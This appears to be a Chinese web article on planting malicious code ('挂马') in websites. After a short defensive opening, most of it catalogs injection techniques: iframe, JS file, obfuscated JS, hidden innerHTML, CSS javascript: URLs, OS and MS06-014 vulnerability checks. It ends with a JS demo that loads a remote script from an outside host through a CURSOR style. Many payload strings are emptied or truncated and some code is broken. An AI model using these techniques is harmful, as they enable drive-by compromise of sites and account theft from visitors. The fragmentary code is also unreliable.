挂马是常见的对网站和客户都影响巨大的危害之一。如果是在访问出来的源文件的头上,或是最后有被加代码,这个一般是网站文件被要改了,或是ARP,如果是源文件的很多数据位置(中间),那一般是数据库被人挂了。服务器上首先要安装防病毒软件,而且要保持在线病毒库的更新,本人推荐使用eset nod32杀毒软件,效果不错,监测查杀木马很及时,一般如果服务器上的网页里被挂马了,一般都会检测出来。
不完全统计,90%的网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。目前挂马主要是为了商业利益,有的挂马是为了赚取流量,有的是为了盗取游戏等账号,也有的是为了好玩,不管是处于那种目的,对于访问被挂马的网站来说都是一种潜在的威胁,影响运营网站公司形象。
一:框架挂马
二:js文件挂马
首先将以下代码
document.write("");
保存为xxx.js,
则JS挂马代码为
三:js变形加密
muma.txt可改成任意后缀
四:body挂马
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n
';
六:css中挂马
body {
background-image: url('javascript:document.write("")')}
七:JAJA挂马
八:图片伪装
九:伪装调用:
十:高级欺骗
页面要显示的内容 十一:判断系统代码
404十二:判断是否有ms06014代码
十三:智能读取js的代码demo
//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("
");
document.writeln("");
document.writeln("");
document.writeln("
");
document.writeln("
<\/HEAD>");
document.writeln(" ");
document.writeln("
");
document.writeln("
document.writeln("style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\"><\/DIV><\/DIV><
\/BODY><\/HTML>")
//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; ivar loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}